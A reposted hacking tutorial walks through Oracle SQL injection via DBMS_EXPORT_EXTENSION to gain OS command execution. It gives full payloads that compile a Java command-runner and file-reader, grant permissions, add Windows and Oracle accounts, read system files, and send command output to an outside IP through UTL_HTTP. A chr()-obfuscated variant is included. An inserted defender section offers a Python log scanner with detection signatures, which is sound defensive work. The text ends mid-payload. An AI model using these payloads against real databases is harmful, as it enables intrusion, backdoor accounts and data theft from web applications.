A worked demonstration of the full process of obtaining a cmdshell through Oracle injection

Posted on 2012-12-18 12:21:48
All of the demonstrations below were run in a web-based SQL*Plus. For web injection, rewrite select SYS.DBMS_EXPORT_EXTENSION..... into the form

/xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)

(the 'a'|| is there so that the statement evaluates to true). The statement is fairly long, so it may have to be submitted with POST.
The individual steps follow:
1. Create the package
By injecting the SYS.DBMS_EXPORT_EXTENSION function, create a Java package LinxUtil on the Oracle server with two functions: runCMD executes system commands and readFile reads files:
/xxx.jsp?id=1 and '1'<>'a'||(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
}'''';END;'';END;--','SYS',0,'1',0) from dual
)
------------------------
If the URL is subject to a length limit, the readFile() function block can be dropped, i.e.:
/xxx.jsp?id=1 and '1'<>'a'||(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
}'''';END;'';END;--','SYS',0,'1',0) from dual
)
In that case also drop the statements in the later steps that deal with readFile().
------------------------------
2. Grant Java permissions
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual
3. Create the functions
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
4. Grant public the right to execute the functions
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual
5. Test whether the steps above succeeded
and '1'<>'11'||(
select  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD'
)
and '1'<>(
select  OBJECT_ID from all_objects where  object_name ='LINXREADFILE'
)
6. Execute commands:
/xxx.jsp?id=1 and '1'<>(
select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
)
/xxx.jsp?id=1 and '1'<>(
select  sys.LinxReadFile('c:/boot.ini') from dual
)
Note that sys.LinxReadFile() returns a varchar, so "and 1<>" cannot be used in place of "and '1'<>".
If you want to see the output, use union:
/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
or UTL_HTTP.request:
/xxx.jsp?id=1 and '1'<>(
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual
)
/xxx.jsp?id=1 and '1'<>(
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual
)
Note: when using UTL_HTTP.request, use REPLACE() to substitute the spaces and newlines, otherwise the HTTP request cannot be submitted. utl_encode.base64_encode works as well.
, a& v* Y6 }4 M) {" }- ^5 q$ W--------------------
6. Internal changes
The changes to all_objects can be seen with the following statement:
select  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%'
7. Remove the functions we created
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
drop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual
====================================================
End of article. I dedicate this piece to my friends.
linx
124829445
2008.1.12
linyujian@bjfu.edu.cn
======================================================================
Another way to test for the vulnerability:
Create an Oracle account:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
That is:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual
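Added here as a defender-side example; it is not part of linx's post or of any Oracle tooling. The Python scanner below reads Apache-style access log lines (the lines are constructed to mirror the requests in this post, with the Java body shortened to "..." and the callback host replaced by the placeholder collector.example), URL-decodes each query string, folds chr()||chr() chains back into the text they spell so that the obfuscated variant just above matches the same signatures as the plain-text form, and reports which stages of the chain each request shows: the DBMS_EXPORT_EXTENSION entry point, the nested EXECUTE IMMEDIATE wrapper, Java source creation, dbms_java grants, Runtime.exec in the Java body, and UTL_HTTP callbacks. The signature set, the log format and the sample lines are assumptions made for illustration.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the stages described in the post (assumed, for illustration).
SIGNATURES = {
    "dbms_export_extension": re.compile(
        r"DBMS_EXPORT_EXTENSION\s*\.\s*GET_DOMAIN_INDEX_TABLES", re.I),
    "nested_execute_immediate": re.compile(
        r"EXECUTE\s+IMMEDIATE.*EXECUTE\s+IMMEDIATE", re.I | re.S),
    "java_source_create": re.compile(
        r"CREATE\s+OR\s+REPLACE\s+AND\s+(?:COMPILE|RESOLVE)\s+JAVA\s+SOURCE", re.I),
    "java_grant_permission": re.compile(r"DBMS_JAVA\s*\.\s*GRANT_PERMISSION", re.I),
    "runtime_exec": re.compile(r"Runtime\s*\.\s*getRuntime\s*\(\s*\)\s*\.\s*exec", re.I),
    "utl_http_exfil": re.compile(r"UTL_HTTP\s*\.\s*REQUEST\s*\(", re.I),
}

# chr(NN)||chr(NN)||... chains, the quote-free spelling used in the obfuscated variant.
CHR_CHAIN = re.compile(r"(?:chr\(\d+\)\s*\|\|\s*)*chr\(\d+\)", re.I)
CHR_ONE = re.compile(r"chr\((\d+)\)", re.I)
REQUEST_PATH = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')

# Constructed fixture: a chr()-chain third argument in the style of the post's
# obfuscated variant, shortened to a dummy inner statement ''x''.
CHR_ENCODED_ARG = (
    "chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)"
    "||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(49)||chr(41)||chr(59)"
    "||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)"
    "||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)"
    "||chr(39)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)"
    "||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)"
    "||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)"
    "||chr(39)||chr(39)||chr(120)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)"
    "||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45)"
)

# Constructed access-log lines (Apache common format), not taken from any real server.
SAMPLE_LOG = [
    # benign request for the same page
    '10.0.0.5 - - [18/Dec/2012:12:21:48 +0800] "GET /xxx.jsp?id=1 HTTP/1.1" 200 5123',
    # step 1 of the post, URL-encoded as a browser would send it (Java body shortened to ...)
    '10.0.0.9 - - [18/Dec/2012:12:22:03 +0800] "GET /xxx.jsp?id=1%20and%20%271%27%3C%3E%27a%27%7C%7C('
    'select%20SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(%27FOO%27,%27BAR%27,'
    '%27DBMS_OUTPUT%22.PUT(1);EXECUTE%20IMMEDIATE%20%27%27DECLARE%20PRAGMA%20AUTONOMOUS_TRANSACTION;'
    'BEGIN%20EXECUTE%20IMMEDIATE%20%27%27%27%27create%20or%20replace%20and%20compile%20java%20source'
    '%20named%20%22LinxUtil%22%20as%20...Runtime.getRuntime().exec(args)...%27%27%27%27;END;%27%27;'
    'END;--%27,%27SYS%27,0,%271%27,0)%20from%20dual) HTTP/1.1" 500 0',
    # the chr()-obfuscated form of the same entry point
    '10.0.0.9 - - [18/Dec/2012:12:25:41 +0800] "GET /xxx.jsp?id=1%20and%201%3C%3E('
    'select%20SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),'
    'chr(66)||chr(65)||chr(82),' + CHR_ENCODED_ARG + ',chr(83)||chr(89)||chr(83),0,chr(49),0)'
    '%20from%20dual) HTTP/1.1" 500 0',
    # result retrieval through UTL_HTTP to an outside host (placeholder hostname)
    '10.0.0.9 - - [18/Dec/2012:12:30:12 +0800] "GET /xxx.jsp?id=1%20and%20%271%27%3C%3E('
    'SELECT%20UTL_HTTP.request(%27http://collector.example/record.php?a=%27%7C%7C'
    'sys.LinxRunCMD(%27...%27))%20FROM%20dual) HTTP/1.1" 500 0',
]


def decode_chr_chains(sql: str) -> str:
    """Fold every chr()||chr()||... chain back into the literal text it spells."""
    return CHR_CHAIN.sub(
        lambda m: "".join(chr(int(n)) for n in CHR_ONE.findall(m.group(0))), sql)


def normalize(request_path: str, fold_chr: bool = True) -> str:
    """URL-decode twice (double encoding is common) and optionally fold chr() chains."""
    text = unquote_plus(unquote_plus(request_path))
    return decode_chr_chains(text) if fold_chr else text


def classify(request_path: str, fold_chr: bool = True) -> list:
    """Return the sorted names of every signature that matches the request."""
    text = normalize(request_path, fold_chr)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(text))


def extract_path(log_line: str) -> str:
    """Pull the request target out of an Apache-style log line ('' if none)."""
    m = REQUEST_PATH.search(log_line)
    return m.group(1) if m else ""


def scan_log(lines) -> list:
    """One finding (client IP, path, matched signatures) per line that matches anything."""
    findings = []
    for line in lines:
        path = extract_path(line)
        hits = classify(path)
        if hits:
            findings.append({"ip": line.split(" ", 1)[0], "path": path, "hits": hits})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ip"], ", ".join(f["hits"]))
```

Folding the chr() chains before matching is the part that matters: without it the obfuscated request only trips the DBMS_EXPORT_EXTENSION name, while after folding it shows the same nested EXECUTE IMMEDIATE wrapper as the plain-text request. A WAF or log pipeline that matches on raw query strings misses exactly the variant this post describes.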
Confirm that the vulnerability is present:
1<>(
select user_id from all_users where username='LINXSQL'
)
Grant linxsql the connect privilege:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
Delete the account:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
======================
The following method creates a function Linx_query() that can execute multiple statements; when execution succeeds it returns the number 1. Its privileges are inherited, though, and may amount to nothing more than PUBLIC, so it seems to be of little use; if you really need it, consider grant dba to the current user:
1.jsp?id=1 and '1'<>(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual
) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE